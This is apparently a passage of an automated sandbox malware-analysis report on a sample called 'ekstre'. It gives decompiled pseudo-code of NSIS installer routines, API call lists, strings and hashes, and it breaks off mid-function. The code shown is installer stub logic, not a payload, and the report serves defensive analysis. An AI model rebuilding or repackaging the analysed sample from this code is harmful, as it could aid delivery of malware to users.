					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x460202;
						 *((short*)(E00405F64(0x460202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405F83(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403d1d
0x00403d26
0x00403d2d
0x00403d2f
0x00403d43
0x00403d55
0x00403d5e
0x00403d67
0x00403d6e
0x00403d73
0x00403d7a
0x00403d8d
0x00403d8d
0x00403d98
0x00403d31
0x00403d3c
0x00403d3c
0x00403d9d
0x00403da7
0x00403db0
0x00403db5
0x00403dc6
0x00403e58
0x00403e60
0x00403e69
0x00403e69
0x00403e7f
0x00403e85
0x00403e93
0x00403f14
0x00403f1c
0x00403f26
0x00403f2b
0x00403f31
0x00403fbb
0x00403fc0
0x00403fc2
0x00403fde
0x00000000
0x00403fde
0x00403fc4
0x00403fca
0x00403fd2
0x00403fd2
0x00000000
0x00403fca
0x00403f3f
0x00403f4a
0x00403f4f
0x00403f51
0x00403f58
0x00403f58
0x00403f63
0x00403f6b
0x00403f6d
0x00403f6f
0x00403f78
0x00403f7b
0x00403f81
0x00403f81
0x00403fa0
0x00403fb1
0x00000000
0x00403fb6
0x00403f1e
0x00403f20
0x00000000
0x00403e95
0x00403e95
0x00403ea1
0x00403eab
0x00403eb1
0x00403eb6
0x00403ec5
0x00403fe3
0x00403fe3
0x00000000
0x00403fe3
0x00403ed4
0x00403f0f
0x00000000
0x00403f0f
0x00403dcc
0x00403dcc
0x00403dcf
0x00403dd1
0x00000000
0x00000000
0x00403ddf
0x00403df1
0x00403df6
0x00403dff
0x00000000
0x00000000
0x00403e05
0x00403e07
0x00403e14
0x00403e14
0x00403e1d
0x00403e23
0x00403e4b
0x00403e53
0x00000000
0x00403e35
0x00403e36
0x00403e3f
0x00403e45
0x00403e46
0x00000000
0x00403e46
0x00403e41
0x00403e43
0x00000000
0x00000000
0x00000000
0x00403e43
0x00403e23

APIs

Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

lstrcatW.KERNEL32(004D1000,00446748), ref: 00403D98
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed,004D1000,00446748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446748,00000000,00000002,75D53420), ref: 00403E18
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed,004D1000,00446748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00446748,00000000), ref: 00403E2B
GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403E36
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed), ref: 00403E7F

Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC

RegisterClassW.USER32(00468200), ref: 00403EBC
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ED4
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403F09
ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
GetClassInfoW.USER32(00000000,RichEdit20W,00468200), ref: 00403F6B
GetClassInfoW.USER32(00000000,RichEdit,00468200), ref: 00403F78
RegisterClassW.USER32(00468200), ref: 00403F81
DialogBoxParamW.USER32(?,00000000,004040C5,00000000), ref: 00403FA0

Strings

Call, xrefs: 00403DDF, 00403DE8, 00403DF6, 00403E45, 00403E4B
Control Panel\Desktop\ResourceLocale, xrefs: 00403D4B
HgD, xrefs: 00403D43
.exe, xrefs: 00403E25
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed, xrefs: 00403DA7, 00403DAF, 00403E52, 00403E58, 00403E68
RichEd20, xrefs: 00403F45
.DEFAULT\Control Panel\International, xrefs: 00403D83
_Nb, xrefs: 00403E9B, 00403F03
RichEdit20W, xrefs: 00403F63, 00403F69
RichEd32, xrefs: 00403F53
RichEdit, xrefs: 00403F72

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Primnesses\Sofabordets\Adreamed$Call$Control Panel\Desktop\ResourceLocale$HgD$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-3140684578
Opcode ID: 73ed780f09f416afeb0c1ac763c95b156211143df06b7d62698f80c1ade7db41
Instruction ID: 9dea7b71855a091a9fc58e9776c06297b5e3adb2bb06172a3bfe2df5a3e7a6f1
Opcode Fuzzy Hash: 73ed780f09f416afeb0c1ac763c95b156211143df06b7d62698f80c1ade7db41
Instruction Fuzzy Hash: 8961E570140301BAD720AF66AD49F2B3AACEB85B49F00457FF945B21E2DB7D8D418A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004030D0 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 204
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E004030D0(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				long _t94;
				signed int _t102;
				signed int _t104;
				void* _t106;
				signed int _t107;
				signed int _t110;
				void* _t111;

				_t94 = 0;
				_v8 = 0;
				_v12 = 0;
				 *0x47026c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x4dd000, 0x2000);
				_t106 = E00406158(0x4dd000, 0x80000000, 3);
				 *0x40a018 = _t106;
				if(_t106 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406668(0x4cd000, 0x4dd000);
				E00406668(0x4e1000, E00405F83(0x4cd000));
				_t54 = GetFileSize(_t106, 0);
				__eflags = _t54;
				 *0x432700 = _t54;
				_t110 = _t54;
				if(_t54 <= 0) {
					L24:
					E0040302E("true");
					__eflags =  *0x470274 - _t94;
					if( *0x470274 == _t94) {
						goto L32;
					}
					__eflags = _v12 - _t94;
					if(_v12 == _t94) {
						L28:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t111 = _t57;
						E00406B90(0x41e668);
						E00406187(0x41e668,  &_v560, 0x4d5000); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004035F8( *0x470274 + 0x1c);
							 *0x432704 = _t65;
							 *0x4326f8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x470270 = _t111;
								 *0x470278 =  *_t111;
								if((_v40 & 0x00000001) != 0) {
									 *0x47027c =  *0x47027c + 1;
									__eflags =  *0x47027c;
								}
								_t45 = _t111 + 0x44; // 0x44
								_t70 = _t45;
								_t102 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t111;
									_t102 = _t102 - 1;
									__eflags = _t102;
								} while (_t102 != 0);
								_t71 =  *0x4326f4; // 0xaf5aa
								 *((intOrPtr*)(_t111 + 0x3c)) = _t71;
								E00406113(0x470280, _t111 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L32;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004035F8( *0x4326f0);
					_t77 = E004035E2( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L32;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L32;
					}
					goto L28;
				} else {
					do {
						_t107 = _t110;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x470274) & 0x00007e00) + 0x200;
						__eflags = _t110 - _t82;
						if(_t110 >= _t82) {
							_t107 = _t82;
						}
						_t83 = E004035E2(0x42a6f0, _t107);
						__eflags = _t83;
						if(_t83 == 0) {
							E0040302E("true");
							L32:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x470274;
						if( *0x470274 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E0040302E(0);
							}
							goto L20;
						}
						E00406113( &_v40, 0x42a6f0, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t89;
						_t104 =  *0x4326f0; // 0x23d44
						 *0x470300 =  *0x470300 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t110;
						 *0x470274 = _t104;
						if(_t92 > _t110) {
							goto L32;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v12 = _v12 + 1;
							_t110 = _t92 - 4;
							__eflags = _t107 - _t110;
							if(_t107 > _t110) {
								_t107 = _t110;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t110 -  *0x432700; // 0x25783
						if(__eflags < 0) {
							_v8 = E00406B22(_v8, 0x42a6f0, _t107);
						}
						 *0x4326f0 =  *0x4326f0 + _t107;
						_t110 = _t110 - _t107;
						__eflags = _t110;
					} while (_t110 != 0);
					_t94 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x004030db
0x004030de
0x004030e1
0x004030fb
0x00403100
0x00403113
0x00403118
0x0040311e
0x00000000
0x00403120
0x00403131
0x00403142
0x00403149
0x0040314f
0x00403151
0x00403156
0x00403158
0x00403243
0x00403245
0x0040324a
0x00403251
0x00000000
0x00000000
0x00403257
0x0040325a
0x00403286
0x0040328b
0x00403296
0x00403298
0x004032a9
0x004032c4
0x004032ca
0x004032cd
0x004032d2
0x004032f1
0x00403301
0x00403313
0x00403318
0x0040331d
0x00403320
0x00403329
0x0040332d
0x00403335
0x0040333a
0x0040333c
0x0040333c
0x0040333c
0x00403344
0x00403344
0x00403347
0x00403348
0x00403348
0x0040334b
0x0040334d
0x0040334d
0x0040334d
0x00403350
0x00403357
0x00403363
0x00403368
0x00000000
0x00403368
0x00000000
0x00403320
0x00000000
0x004032d4
0x00403262
0x0040326d
0x00403272
0x00403274
0x00000000
0x00000000
0x0040327d
0x00403280
0x00000000
0x00000000
0x00000000
0x0040315e
0x00403163
0x00403168
0x0040316c
0x00403173
0x00403178
0x0040317a
0x0040317c
0x0040317c
0x00403180
0x00403185
0x00403187
0x004032e0
0x00403322
0x00000000
0x00403322
0x0040318d
0x00403194
0x00403210
0x00403214
0x00403218
0x0040321d
0x00000000
0x00403214
0x0040319d
0x004031a2
0x004031a5
0x004031aa
0x00000000
0x00000000
0x004031ac
0x004031b3
0x00000000
0x00000000
0x004031b5
0x004031bc
0x00000000
0x00000000
0x004031be
0x004031c5
0x00000000
0x00000000
0x004031c7
0x004031ce
0x00000000
0x00000000
0x004031d0
0x004031d6
0x004031df
0x004031e5
0x004031e8
0x004031ea
0x004031f0
0x00000000
0x00000000
0x004031f6
0x004031fa
0x00403202
0x00403202
0x00403205
0x00403208
0x0040320a
0x0040320c
0x0040320c
0x00000000
0x0040320a
0x004031fc
0x00403200
0x00000000
0x00000000
0x00000000
0x0040321e
0x0040321e
0x00403224
0x00403230
0x00403230
0x00403233
0x00403239
0x00403239
0x00403239
0x00403241
0x00403241
0x00000000
0x00403241

APIs

GetTickCount.KERNEL32 ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,004DD000,00002000), ref: 00403100

Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,004DD000,80000000,00000003), ref: 0040615C
Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 0040617E

GetFileSize.KERNEL32(00000000,00000000,004E1000,00000000,004CD000,004CD000,004DD000,004DD000,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B

Strings

soft, xrefs: 004031BE
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403322
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032D4
hA, xrefs: 00403291
Null, xrefs: 004031C7
Inst, xrefs: 004031B5
Error launching installer, xrefs: 00403120

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$hA$soft
API String ID: 2803837635-3376623841
Opcode ID: 9adf2b0bc2243993cb7948316c615c74caaffecf27dfc9f4f7777cec200279f1
Instruction ID: 1bcc98e1504a37ecc5eb7fbfcd7f57d5c625885083fa168b6d57319d9c73866f
Opcode Fuzzy Hash: 9adf2b0bc2243993cb7948316c615c74caaffecf27dfc9f4f7777cec200279f1
Instruction Fuzzy Hash: 9971B171941204ABDB20DFA5DD85B9E3AACAB04316F20857FF905B72D2DB789E408B5C

Uniqueness

Uniqueness Score: -1.00%

Function 004066A5 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 196
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x46823c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x470298 + _t44 * 2;
				_t45 = 0x460200;
				_t108 = 0x460200;
				if(_a4 >= 0x460200 && _a4 - 0x460200 >> 1 < 0x4000) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x4000) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x460200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xe) + 0x471000;
								E00406668(_t108, (_t78 << 0xe) + 0x471000);
							} else {
								E004065AF(_t108,  *0x470268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x4702e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x2000);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x470264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x470268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x470268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
									__eflags = _t63;
									if(_t63 == 0) {
										goto L26;
									}
									goto L22;
								}
								goto L26;
							}
							GetSystemDirectoryW(_t108, 0x2000);
							goto L26;
						} else {
							E00406536( *0x470298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x470298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040); // executed
							if( *_t108 != 0) {
								L27:
								if(_v16 == 0x1a) {
									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L29;
							}
							E004066A5(_t77, _t105, _t108, _t108, _v16);
							L26:
							if( *_t108 == 0) {
								goto L29;
							}
							goto L27;
						}
					}
					goto L43;
				}
			}

0x004066a5
0x004066a5
0x004066a5
0x004066ab
0x004066b0
0x004066c1
0x004066c1
0x004066c9
0x004066ca
0x004066cb
0x004066cc
0x004066cf
0x004066d7
0x004066d9
0x004066ea
0x004066ed
0x004066ed
0x004066f1
0x004066f7
0x004066fa
0x004068d5
0x004068d5
0x004068e0
0x004068ec
0x004068ec
0x00000000
0x00406700
0x00406705
0x0040671a
0x0040671b
0x00406721
0x004068b3
0x004068c1
0x004068c4
0x004068c4
0x004068b5
0x004068b8
0x004068bb
0x004068bd
0x004068bd
0x004068c6
0x004068c6
0x004068cc
0x004068cf
0x00406702
0x00000000
0x00406702
0x00000000
0x004068cf
0x00406727
0x0040672a
0x00406739
0x00406740
0x0040674c
0x0040674f
0x00406752
0x00406753
0x00406758
0x0040675e
0x00406761
0x00406764
0x00406857
0x0040685c
0x0040688f
0x00406894
0x00406899
0x0040689e
0x0040689e
0x004068a3
0x004068a9
0x004068ac
0x00000000
0x004068ac
0x0040685e
0x00406861
0x00406864
0x00406879
0x00406880
0x00406866
0x0040686d
0x0040686d
0x00406888
0x0040688b
0x0040684f
0x00406850
0x00406850
0x00000000
0x0040688b
0x00406771
0x00406775
0x00406775
0x00406776
0x00406778
0x004067b5
0x004067b8
0x004067c8
0x004067cb
0x004067d3
0x004067d9
0x004067d9
0x00406834
0x00406834
0x00406836
0x00000000
0x00000000
0x004067dd
0x004067e2
0x004067e3
0x004067e5
0x004067fc
0x0040680a
0x00406810
0x00406812
0x00406830
0x00406830
0x00406830
0x00000000
0x00406830
0x00406818
0x00406821
0x00406824
0x0040682a
0x0040682e
0x00000000
0x00000000
0x00000000
0x0040682e
0x004067f6
0x004067f8
0x004067fa
0x00000000
0x00000000
0x00000000
0x004067fa
0x00000000
0x00406834
0x004067c0
0x00000000
0x0040677a
0x00406798
0x004067a1
0x0040683e
0x00406842
0x0040684a
0x0040684a
0x00000000
0x00406842
0x004067ab
0x00406838
0x0040683c
0x00000000
0x00000000
0x00000000
0x0040683c
0x00406778
0x00000000
0x00406705

APIs

GetSystemDirectoryW.KERNEL32(Call,00002000), ref: 004067C0
GetWindowsDirectoryW.KERNEL32(Call,00002000,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000,00000000,00000000,00000000), ref: 004067D3
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll,00000000), ref: 004068A4

Strings

Call, xrefs: 004066CF, 00406782, 00406789, 0040678D, 004067AA, 004067BF, 004067D2, 004067E7, 00406814, 00406849, 0040684F, 0040686C, 0040687F, 0040689D, 004068A3, 004068AC, 004068E2
Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll, xrefs: 004066CA
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040678E
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406844

Memory Dump Source

Source File: 00000000.00000002.1223360699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1223332334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223422559.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000481000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.00000000004C9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223458765.0000000000661000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1223910796.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ekstre.jbxd

Similarity

API ID: Directory$SystemWindowslstrcatlstrlen
String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsc76F4.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 4260037668-14510534
Opcode ID: 0f5a8af760075a28b239619660895707e83ab57078bead619950fa75d628ea59
Instruction ID: 8e3ecdcd1f33a8191bdbbf481d2aa87b9147467fb839849d6121fd5a880d6789
Opcode Fuzzy Hash: 0f5a8af760075a28b239619660895707e83ab57078bead619950fa75d628ea59
Instruction Fuzzy Hash: A161E272902215EADB10AF64DC54BAA37A5EF10314F22C13FE907B62D0EB7D49A1CB4D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FAE( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405F37(E00406668(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Primnesses\\Sofabordets\\Adreamed\\Buntmagersyers\\Mamelonation")), ??);
				} else {
					E00406668();
				}
				E004068EF(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040699E(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
